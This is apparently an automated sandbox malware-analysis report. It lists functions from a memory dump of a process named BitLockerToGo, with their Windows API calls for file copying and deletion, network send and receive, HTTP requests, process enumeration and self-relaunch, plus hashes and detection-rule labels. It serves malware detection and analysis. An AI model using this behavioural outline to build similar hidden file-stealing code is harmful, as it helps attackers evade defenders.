                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004A8DF2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DriveLogicalStrings
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2022863570-0
                                                                                                                                                                                                                                      • Opcode ID: 782fa34e7f5c95355a23744b84f8b2fe77898984513ca0b872735b90d8d8bb69
                                                                                                                                                                                                                                      • Instruction ID: 13fde9cdf1d40a0dc00978870dbe3f50b1b77b59efef7f16381529ee049e790b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 782fa34e7f5c95355a23744b84f8b2fe77898984513ca0b872735b90d8d8bb69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21F039B5E012059FEB08CF54D895BD87BB1FB04300F24047EE606DB381DA3499488B80
                                                                                                                                                                                                                                      Function 0048A09E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00001000,00000000), ref: 0048A0BA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: recv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1507349165-0
                                                                                                                                                                                                                                      • Opcode ID: 3a824363a1b040b363b85bf5f23b4d7d7e55ef8d9bfe290a02a79d7ba8b9bb1f
                                                                                                                                                                                                                                      • Instruction ID: 11c1cdc8ab63dbb90669f464b97500e1c9475acbdf5f663fc12b6587676e8fe1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a824363a1b040b363b85bf5f23b4d7d7e55ef8d9bfe290a02a79d7ba8b9bb1f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53E0EC31340240EBE755D75DDC95F6123D5AB84348F444828AA5ADB382EA64ED158715
                                                                                                                                                                                                                                      Function 0049F6B3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0049F6D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                      • Opcode ID: 5586c491630fbf457190015482e40f435d4eb71c66cffc8ccac079031cbeda55
                                                                                                                                                                                                                                      • Instruction ID: 843cc645776de446307c993fd98e31bcbad12a6b6088e2ec2d91297030039f18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5586c491630fbf457190015482e40f435d4eb71c66cffc8ccac079031cbeda55
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE08CBA70030097D7088B4ADC55F31B3E6ABE8704F18842DA806DB3E5D678E8048600
                                                                                                                                                                                                                                      Function 00485B4B Relevance: 16.4, APIs: 1, Strings: 8, Instructions: 673memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 575 485b4b-48618a RtlAllocateHeap 681 48618e-486264 call 4ba4a2 * 3 575->681
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00486179
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID: H&M$H&M$H&M$H&M$O&M$u&M$u&M$|&M
                                                                                                                                                                                                                                      • API String ID: 1279760036-3828463159
                                                                                                                                                                                                                                      • Opcode ID: 64aea8e2fd120879f272d080f543e353071f04a5e5b62d4c3e91b2c40eb0baa5
                                                                                                                                                                                                                                      • Instruction ID: 89f8a7c60db11cfb9221b839be602ce1f6a902d1a70fbb2a80727ee6d54dc313
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64aea8e2fd120879f272d080f543e353071f04a5e5b62d4c3e91b2c40eb0baa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE22DDB5702410AFCB85DB9DDCA5EADB3EAAFD8308708402DE019D3361DA789E158B5D
                                                                                                                                                                                                                                      Function 0048E827 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 176fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 697 48e827-48e9fb CopyFileA 723 48e9fd call 48bc40 697->723 724 48e9fd call 48bd53 697->724 725 48e9fd call 48bd06 697->725 722 48e9ff-48ea1d 723->722 724->722 725->722
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0048E9D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID: :)M$J(M$lTL$lTL$'M
                                                                                                                                                                                                                                      • API String ID: 1304948518-3459179899
                                                                                                                                                                                                                                      • Opcode ID: dde123acb593646ffde0e628b4125f19fe44f6b7501fadaf4e7cce1f73355b36
                                                                                                                                                                                                                                      • Instruction ID: 98c3cf451cfe7b81bf3de48994db91d139a6a57a8dc5fa9d780da12493724403
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde123acb593646ffde0e628b4125f19fe44f6b7501fadaf4e7cce1f73355b36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B25150B27001189FC784DB9CDDD1FAD33BAEFC8608B084429E406D7355DA74AE65CB99
                                                                                                                                                                                                                                      Function 004AD6FE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 726 4ad6fe-4ad897 ShellExecuteEx call 4ba49c ExitProcess 745 4ad89b-4ad8c0 726->745
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 004AD844
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 004AD87E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteExitProcessShell
                                                                                                                                                                                                                                      • String ID: 3@M$=@M$=@M
                                                                                                                                                                                                                                      • API String ID: 1124553745-2334948649
                                                                                                                                                                                                                                      • Opcode ID: 9510a1bd5593447776f5e8743bbd25c82606a11320aafe6051924674a320e7b2
                                                                                                                                                                                                                                      • Instruction ID: 311962f18672ce14545a05bebf68f1d9262b4519ef7f792834c5594ec691eb37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9510a1bd5593447776f5e8743bbd25c82606a11320aafe6051924674a320e7b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE414F72B006089BC744DF9DDC91EAD73E6BFD8604B44413AE819C3322DBB8EA59875D
                                                                                                                                                                                                                                      Function 00489E2C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 761 489e2c-48a062 send
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 0048A046
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                                      • String ID: 5'M$u'M$x'M
                                                                                                                                                                                                                                      • API String ID: 2809346765-1851399892
                                                                                                                                                                                                                                      • Opcode ID: ccc8351959ea5841767cc329adc7abf2321faee5437f7c11b48d82a3cb8c4f7f
                                                                                                                                                                                                                                      • Instruction ID: 52c4f4e5c3b1908af76c204e24ee32806c29c8b834361e9fce54f2313e37780d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccc8351959ea5841767cc329adc7abf2321faee5437f7c11b48d82a3cb8c4f7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE516872600105AFC268CB5CECD5F9A73D9AFD4218F0C4538E51AC3351E6B8AE29C75E
                                                                                                                                                                                                                                      Function 0048DDC3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 127fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 786 48ddc3-48df10 CopyFileA 805 48df16 call 48bc40 786->805 806 48df16 call 48bd53 786->806 804 48df18-48df36 805->804 806->804
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0048DEE9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID: $|X$J(M$'M
                                                                                                                                                                                                                                      • API String ID: 1304948518-253270136
                                                                                                                                                                                                                                      • Opcode ID: 4c9b7f9ab91c42eae8b8973655a8bedc499234be0ceffd5bbc65be48ace4cba6
                                                                                                                                                                                                                                      • Instruction ID: dbb812394bb4c3c142b29ec16f8467c221e9a71d9a97e5fae8367467fc92bde7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9b7f9ab91c42eae8b8973655a8bedc499234be0ceffd5bbc65be48ace4cba6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C4184B2B021189FC754DB6CEC92FDD73F5AF84308B094565E806D3321DA34AE24CB99
                                                                                                                                                                                                                                      Function 0048CB8C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124memoryfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 807 48cb8c-48ccd6 RtlAllocateHeap RtlFreeHeap DeleteFileA 825 48ccda-48cce0 807->825 826 48cce5 825->826 826->826
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0048CBB0
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0048CCB4
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0048CCCD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocateDeleteFileFree
                                                                                                                                                                                                                                      • String ID: [(M
                                                                                                                                                                                                                                      • API String ID: 2485951164-3398994884
                                                                                                                                                                                                                                      • Opcode ID: 0bd51e1cfc6585b3a8174c93931fd4257e914b20b5c1aaa6316c7a567507581d
                                                                                                                                                                                                                                      • Instruction ID: 81739a79c32119aa09000be33bccf6298c5a99172aa8d5924a599979ff69da72
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd51e1cfc6585b3a8174c93931fd4257e914b20b5c1aaa6316c7a567507581d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D54142B26001199FC744EB6CEC95E6E77F9FFC87487044428E419D3311CA34AA26CBAD
                                                                                                                                                                                                                                      Function 0048E0C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 827 48e0c8-48e217 CopyFileA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0048E1F0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID: $|X$J(M$'M
                                                                                                                                                                                                                                      • API String ID: 1304948518-253270136
                                                                                                                                                                                                                                      • Opcode ID: c7e4a27607252e218fce1b8758023a5e9b1a2dd997a4fc5d0027a15b8c205671
                                                                                                                                                                                                                                      • Instruction ID: 2b2c901324052d99339a6408e542cd3cf6f0281ba369ed67a701916aaff43c21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e4a27607252e218fce1b8758023a5e9b1a2dd997a4fc5d0027a15b8c205671
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02414FB27020149BC785CB9CDCD2FED77B5AF89308B054439E419E3361DA34AE298B59
                                                                                                                                                                                                                                      Function 0048E26E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 844 48e26e-48e38b DeleteFileA 856 48e38f-48e3ae 844->856
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0048E382
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                                      • String ID: $|X$-)M$-)M
                                                                                                                                                                                                                                      • API String ID: 4033686569-1042820607
                                                                                                                                                                                                                                      • Opcode ID: d7295721a7e0c088cba4d7a6159817ee0ec203bd99d20598ff045f8666c0802e
                                                                                                                                                                                                                                      • Instruction ID: 99b986d776711aadc469109296f19dfbcb31b88eab55782b3cf43f62f85a910a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7295721a7e0c088cba4d7a6159817ee0ec203bd99d20598ff045f8666c0802e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24412FB6A011099FCB55CBA8DC91EEDB7F1BF88308B048529E815E3324D638AA15CF59
                                                                                                                                                                                                                                      Function 004877B6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 858 4877b6-487841 HttpOpenRequestA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,004D2660,?,004D260A,00000000,00000000,?,00000000), ref: 00487822
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                                                                                                                      • String ID: &M$`&M$`&M
                                                                                                                                                                                                                                      • API String ID: 1984915467-3483265397
                                                                                                                                                                                                                                      • Opcode ID: 6f77ca394b148633c62343425881ea382f78e09fa53ccdf1bae8edf4a6205156
                                                                                                                                                                                                                                      • Instruction ID: 4ad165975337ee0b7531aefddc2e08b9c494b078db6a88286539a6c935019ed5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f77ca394b148633c62343425881ea382f78e09fa53ccdf1bae8edf4a6205156
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2501D4B4700205AFDB48CB54DDD6E6A77AAFB99304B084529E002D3311E6B4BD10C799
                                                                                                                                                                                                                                      Function 004877BF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 862 4877bf-487841 HttpOpenRequestA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,004D2660,?,004D260A,00000000,00000000,?,00000000), ref: 00487822
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                                                                                                                      • String ID: &M$`&M$`&M
                                                                                                                                                                                                                                      • API String ID: 1984915467-3483265397
                                                                                                                                                                                                                                      • Opcode ID: 508adee47663d14b72415072c700238cb6a67ba10b09cbe495a234499fd7d32f
                                                                                                                                                                                                                                      • Instruction ID: b0600898247d21ce2cca07b30290ef4936c0358d331848f932ee027c60d1e6ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508adee47663d14b72415072c700238cb6a67ba10b09cbe495a234499fd7d32f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4701D4B4700205AFCB48CB54DD96E6B73AAFB98304B084129E002D7311E7B4BD10C798
                                                                                                                                                                                                                                      Function 004AD651 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 866 4ad651-4ad8c0 ShellExecuteEx call 4ba49c ExitProcess
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 004AD844
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 004AD87E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteExitProcessShell
                                                                                                                                                                                                                                      • String ID: 3@M
                                                                                                                                                                                                                                      • API String ID: 1124553745-561574131
                                                                                                                                                                                                                                      • Opcode ID: 71bd441e5bc8d0138ee1efbb0201af1354206ce9ba1d829235e299169278d26c
                                                                                                                                                                                                                                      • Instruction ID: 68f69522df59f896ffc3e34a937fe17de669b7143d542973ba8a783969d56d48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bd441e5bc8d0138ee1efbb0201af1354206ce9ba1d829235e299169278d26c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2518D72B006089BC744DF9DDC91EAD73E6AFD9604708413AE815C3322DBB8EE59875D
                                                                                                                                                                                                                                      Function 004AC6C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 894 4ac6c8-4ac7b3 CreateDirectoryA 918 4ac7b4 call 4ab6b8 894->918 919 4ac7b4 call 4ab7fd 894->919 906 4ac7b6-4ac869 920 4ac86b call 485170 906->920 921 4ac86b call 485053 906->921 922 4ac86b call 484f86 906->922 916 4ac86d-4ac8b4 918->906 919->906 920->916 921->916 922->916
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 004AC7A4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                      • String ID: lTL$lTL
                                                                                                                                                                                                                                      • API String ID: 4241100979-340171136
                                                                                                                                                                                                                                      • Opcode ID: 7be5032fd38aeb3cbf47a0822f860e6c4a57bdfd00b986428e7aacae4511382f
                                                                                                                                                                                                                                      • Instruction ID: eb8a62318ab9131c77fd56a5bb3146fc54b1f05ac548cfdd73b477c39c32f4bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7be5032fd38aeb3cbf47a0822f860e6c4a57bdfd00b986428e7aacae4511382f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 285154B1B001108FCB54DF6CDC81EAA77F6EFC4204B088479E41BD3355DA38AA59CB98
                                                                                                                                                                                                                                      Function 0048ED79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0048EE9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID: J(M$'M
                                                                                                                                                                                                                                      • API String ID: 1304948518-3464256388
                                                                                                                                                                                                                                      • Opcode ID: 1a223c409c8c6a1d6f5756ed3690c9aa365393436c0c80515a434ceda6328fbc
                                                                                                                                                                                                                                      • Instruction ID: 156b95584ecc2eafb30c09ee654c3c91ff209848323d3c4d612580c03622f6d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a223c409c8c6a1d6f5756ed3690c9aa365393436c0c80515a434ceda6328fbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA414F72B001189FC744DF9CDD91FAD77B5AF88218B084039E41AE7351DA34AE69CB5A
                                                                                                                                                                                                                                      Function 0049F955 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2E68,?,?,?,?), ref: 0049F98C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID: h.M$h.M
                                                                                                                                                                                                                                      • API String ID: 3660427363-3524178866
                                                                                                                                                                                                                                      • Opcode ID: 16c64c184c5341ceca6e21a1ba47a2edcc47c46b5f94593c5dd436b2acc49527
                                                                                                                                                                                                                                      • Instruction ID: 2800aadbb23cef75f98de46c7914d762f6898651ac6b6643f1b78e12b683f41e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16c64c184c5341ceca6e21a1ba47a2edcc47c46b5f94593c5dd436b2acc49527
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5E09BB7650104AFC108D74DEC51C67B39DFBD8115B04053EF549C3310D6656D15C664
                                                                                                                                                                                                                                      Function 004A35EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004A3615
                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000), ref: 004A3622
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
